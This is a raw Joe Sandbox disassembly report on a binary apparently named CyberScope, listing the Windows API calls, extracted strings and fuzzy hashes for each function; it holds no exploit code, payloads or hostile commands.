                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 1256254125-909552448
                                                                                    • Opcode ID: 15f971c124d12fda2c95d0738d3c8636e405d64c3df07c212b7773a19059a7c6
                                                                                    • Instruction ID: 16a533b87cc58459fa0f83d95205160b0c3ed8c445dae9e6c3c2a64b9c99f0df
                                                                                    • Opcode Fuzzy Hash: 15f971c124d12fda2c95d0738d3c8636e405d64c3df07c212b7773a19059a7c6
                                                                                    • Instruction Fuzzy Hash: FF71F43263016BDBCB109E7CD9405FA33E6AB70758B610128EC56AB294EB75DDA5C3A0
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00228DB5
                                                                                    • _wcslen.LIBCMT ref: 00228DC9
                                                                                    • _wcslen.LIBCMT ref: 00228DEC
                                                                                    • _wcslen.LIBCMT ref: 00228E0F
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00228E4D
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00226691), ref: 00228EA9
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00228EE2
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00228F25
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00228F5C
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00228F68
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00228F78
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00226691), ref: 00228F87
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00228FA4
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00228FB0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 799131459-1154884017
                                                                                    • Opcode ID: ed918e75f0b9cf922522a7ace2eb48ce34bf1dcbe11fde6eebcd6dcd43ad7ff2
                                                                                    • Instruction ID: df7e0a28473cb10e8517d85505eaaa542813290beb33e14f76c7a82114c3285b
                                                                                    • Opcode Fuzzy Hash: ed918e75f0b9cf922522a7ace2eb48ce34bf1dcbe11fde6eebcd6dcd43ad7ff2
                                                                                    • Instruction Fuzzy Hash: 8A61D171920225BFEB24DFA4EC45BFE77A8AF18B10F508106F915D61D1DBB4E960CBA0
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0020493D
                                                                                    • _wcslen.LIBCMT ref: 00204948
                                                                                    • _wcslen.LIBCMT ref: 0020499F
                                                                                    • _wcslen.LIBCMT ref: 002049DD
                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00204A1B
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00204A63
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00204A9E
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00204ACC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 1839972693-4113822522
                                                                                    • Opcode ID: 43b7111eae88d30a95ef96fb0568a26435c166d3530abceec6249082cdb0876e
                                                                                    • Instruction ID: f08999158b6c3779e3d49ddca4f8951fb7fd523ef51e62170cc4f77edbd75d7f
                                                                                    • Opcode Fuzzy Hash: 43b7111eae88d30a95ef96fb0568a26435c166d3530abceec6249082cdb0876e
                                                                                    • Instruction Fuzzy Hash: 487116B26183029FC710EF34D85096BB7E4EF64758F00892DF996972A2EB30DD55CB91
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000063), ref: 001F6395
                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001F63A7
                                                                                    • SetWindowTextW.USER32(?,?), ref: 001F63BE
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001F63D3
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001F63D9
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001F63E9
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001F63EF
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001F6410
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001F642A
                                                                                    • GetWindowRect.USER32(?,?), ref: 001F6433
                                                                                    • _wcslen.LIBCMT ref: 001F649A
                                                                                    • SetWindowTextW.USER32(?,?), ref: 001F64D6
                                                                                    • GetDesktopWindow.USER32 ref: 001F64DC
                                                                                    • GetWindowRect.USER32(00000000), ref: 001F64E3
                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001F653A
                                                                                    • GetClientRect.USER32(?,?), ref: 001F6547
                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 001F656C
                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001F6596
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 895679908-0
                                                                                    • Opcode ID: 1efc756abf9fb25b4603d6d15dec4823d412c55541565cf12728b0c8d6072293
                                                                                    • Instruction ID: 3c50f82215b5cce2e61a385fa1e854f055212a8158390d1a249870e0cf476e0b
                                                                                    • Opcode Fuzzy Hash: 1efc756abf9fb25b4603d6d15dec4823d412c55541565cf12728b0c8d6072293
                                                                                    • Instruction Fuzzy Hash: FF717C31900709EFDB20DFA8DE49ABEBBF5FF48704F104918E686A26A0D775E945CB50
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00210884
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0021088F
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0021089A
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 002108A5
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 002108B0
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 002108BB
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 002108C6
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 002108D1
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 002108DC
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 002108E7
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 002108F2
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 002108FD
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00210908
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00210913
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0021091E
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00210929
                                                                                    • GetCursorInfo.USER32(?), ref: 00210939
                                                                                    • GetLastError.KERNEL32 ref: 0021097B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                    • String ID:
                                                                                    • API String ID: 3215588206-0
                                                                                    • Opcode ID: d7379bef63fecf1e60d7f737d98613fb5d67dbd8027701deaa9adb5a7fa7927a
                                                                                    • Instruction ID: c19b25aca76e810d652c1df8e94a0c7bd896077db0eb5aead99583f771c6ef6b
                                                                                    • Opcode Fuzzy Hash: d7379bef63fecf1e60d7f737d98613fb5d67dbd8027701deaa9adb5a7fa7927a
                                                                                    • Instruction Fuzzy Hash: E74145B0D083196ADB10DFB68CC985EBFE8FF04754B50452AE11CEB291DB789941CF91
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k%
                                                                                    • API String ID: 176396367-1954330058
                                                                                    • Opcode ID: 514d5fd1b4e6c29134e6e16f05ba158df1101ef74007c19a27b9dfe045ccc418
                                                                                    • Instruction ID: a1f77f5cfe26c16c0ebd69f264a4f6103d27d221a2b5d8a3142de8cf83ebcff0
                                                                                    • Opcode Fuzzy Hash: 514d5fd1b4e6c29134e6e16f05ba158df1101ef74007c19a27b9dfe045ccc418
                                                                                    • Instruction Fuzzy Hash: 28E10432A0051AABCF18DFB4C8516FDFBB1BF54710F50411AEA66F7241DB30AE998790
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00229BA3
                                                                                      • Part of subcall function 002280AE: ClientToScreen.USER32(?,?), ref: 002280D4
                                                                                      • Part of subcall function 002280AE: GetWindowRect.USER32(?,?), ref: 0022814A
                                                                                      • Part of subcall function 002280AE: PtInRect.USER32(?,?,?), ref: 0022815A
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00229C0C
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00229C17
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00229C3A
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00229C81
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00229C9A
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00229CB1
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00229CD3
                                                                                    • DragFinish.SHELL32(?), ref: 00229CDA
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00229DCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(&$(&
                                                                                    • API String ID: 221274066-3981107569
                                                                                    • Opcode ID: 2c54f3289511a0f87ae7a029f672487d9ee0fbdc13d81d29fc02fd9d08fb424f
                                                                                    • Instruction ID: 6d67b16ee872601a0c6845fd4397e13d251586c79b0353d06c383a3e9b9f70cf
                                                                                    • Opcode Fuzzy Hash: 2c54f3289511a0f87ae7a029f672487d9ee0fbdc13d81d29fc02fd9d08fb424f
                                                                                    • Instruction Fuzzy Hash: E4617971508301AFC711EFA0EC89DAFBBE8FF99750F40091EF591921A1DB70AA59CB52
                                                                                    APIs
                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001B0436
                                                                                      • Part of subcall function 001B045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0026170C,00000FA0,B0CEBFC7,?,?,?,?,001D2733,000000FF), ref: 001B048C
                                                                                      • Part of subcall function 001B045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001D2733,000000FF), ref: 001B0497
                                                                                      • Part of subcall function 001B045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001D2733,000000FF), ref: 001B04A8
                                                                                      • Part of subcall function 001B045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001B04BE
                                                                                      • Part of subcall function 001B045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001B04CC
                                                                                      • Part of subcall function 001B045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001B04DA
                                                                                      • Part of subcall function 001B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001B0505
                                                                                      • Part of subcall function 001B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001B0510
                                                                                    • ___scrt_fastfail.LIBCMT ref: 001B0457
                                                                                      • Part of subcall function 001B0413: __onexit.LIBCMT ref: 001B0419
                                                                                    Strings
                                                                                    • InitializeConditionVariable, xrefs: 001B04B8
                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001B0492
                                                                                    • SleepConditionVariableCS, xrefs: 001B04C4
                                                                                    • kernel32.dll, xrefs: 001B04A3
                                                                                    • WakeAllConditionVariable, xrefs: 001B04D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                    • API String ID: 66158676-1714406822
                                                                                    • Opcode ID: af29ece8e4005800cd2b868688d61174816f0992f4e12c04ad61f327c2e9fd84
                                                                                    • Instruction ID: f5d19108e8616c74b8171e6fc0c93e2cc5e0609ebc9cbedc135165eddba807cd
                                                                                    • Opcode Fuzzy Hash: af29ece8e4005800cd2b868688d61174816f0992f4e12c04ad61f327c2e9fd84
                                                                                    • Instruction Fuzzy Hash: F921F672A407047BD7366BE4BC4ABEB77D4EB0DB62F040125F90692A80DBB498518A60
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(00000000,00000000,0022DCD0), ref: 00204F6C
                                                                                    • _wcslen.LIBCMT ref: 00204F80
                                                                                    • _wcslen.LIBCMT ref: 00204FDE
                                                                                    • _wcslen.LIBCMT ref: 00205039
                                                                                    • _wcslen.LIBCMT ref: 00205084
                                                                                    • _wcslen.LIBCMT ref: 002050EC
                                                                                      • Part of subcall function 001AFD52: _wcslen.LIBCMT ref: 001AFD5D
                                                                                    • GetDriveTypeW.KERNEL32(?,00257C10,00000061), ref: 00205188
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2055661098-1000479233
                                                                                    • Opcode ID: 99d55e41c5a9eec682e753feabe81fc8a6f100895cd5f46220fbb9a7698adf93
                                                                                    • Instruction ID: b55e78f735e01cb37a38b1d5793a499eb83c57dede3f5f95d0f521bb889f4cf6
                                                                                    • Opcode Fuzzy Hash: 99d55e41c5a9eec682e753feabe81fc8a6f100895cd5f46220fbb9a7698adf93
                                                                                    • Instruction Fuzzy Hash: 38B1F2316287129FC710EF28D890A6FB7E6AFA4724F10491DF59AC72D2D770D854CB92
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0021BBF8
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0021BC10
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0021BC34
                                                                                    • _wcslen.LIBCMT ref: 0021BC60
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0021BC74
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0021BC96
                                                                                    • _wcslen.LIBCMT ref: 0021BD92
                                                                                      • Part of subcall function 00200F4E: GetStdHandle.KERNEL32(000000F6), ref: 00200F6D
                                                                                    • _wcslen.LIBCMT ref: 0021BDAB
                                                                                    • _wcslen.LIBCMT ref: 0021BDC6
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021BE16
                                                                                    • GetLastError.KERNEL32(00000000), ref: 0021BE67
                                                                                    • CloseHandle.KERNEL32(?), ref: 0021BE99
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0021BEAA
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0021BEBC
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0021BECE
                                                                                    • CloseHandle.KERNEL32(?), ref: 0021BF43
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2178637699-0
                                                                                    • Opcode ID: c79b2b7f455eeda400095c9ae99206564688d75104f51a7f2ab0de5de7ab4074
                                                                                    • Instruction ID: 9d3e327680265b290eaf0f74005a7dc0ee009d8af22d6145bfdf9709e38a0cbf
                                                                                    • Opcode Fuzzy Hash: c79b2b7f455eeda400095c9ae99206564688d75104f51a7f2ab0de5de7ab4074
                                                                                    • Instruction Fuzzy Hash: 50F1CE315143019FCB15EF24C891BABBBF1AFA5314F14855DF8858B2A2CB71ED91CB92
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0022DCD0), ref: 00214B18
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00214B2A
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0022DCD0), ref: 00214B4F
                                                                                    • FreeLibrary.KERNEL32(00000000,?,0022DCD0), ref: 00214B9B
                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,0022DCD0), ref: 00214C05
                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00214CBF
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00214D25
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00214D4F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 354098117-199464113
                                                                                    • Opcode ID: b28746e65954dd54682f9b1a162551ae9d869b8ae8e3446c300f6c0bd33ee8ca
                                                                                    • Instruction ID: 88e55d6be081e5d445c60e844f8df3d768f1bbaf5bb517cbae2c4fc9b4ab8e87
                                                                                    • Opcode Fuzzy Hash: b28746e65954dd54682f9b1a162551ae9d869b8ae8e3446c300f6c0bd33ee8ca
                                                                                    • Instruction Fuzzy Hash: 2D124C71A10105EFDB14DF94C888EAAB7F5FF55318F248098F809AB251D771EE96CBA0
                                                                                    APIs
                                                                                    • GetMenuItemCount.USER32(002629C0), ref: 001D3F72
                                                                                    • GetMenuItemCount.USER32(002629C0), ref: 001D4022
                                                                                    • GetCursorPos.USER32(?), ref: 001D4066
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 001D406F
                                                                                    • TrackPopupMenuEx.USER32(002629C0,00000000,?,00000000,00000000,00000000), ref: 001D4082
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001D408E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                    • String ID: 0
                                                                                    • API String ID: 36266755-4108050209
                                                                                    • Opcode ID: 93df8abb26263e61681223c5041a4e03c037ebb5d2f3c3d00a703ddcf33de775
                                                                                    • Instruction ID: 5d1b5fd9d9b8163a016544f9bc1f231e8ca4f48ebb707fb7e0a96e4a7fc9b4c2
                                                                                    • Opcode Fuzzy Hash: 93df8abb26263e61681223c5041a4e03c037ebb5d2f3c3d00a703ddcf33de775
                                                                                    • Instruction Fuzzy Hash: 68710A31A44209FFEB259F69DC8DFAABF65FF05364F200216F624A62D0C7B19920D751
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00227823
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00227897
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002278B9
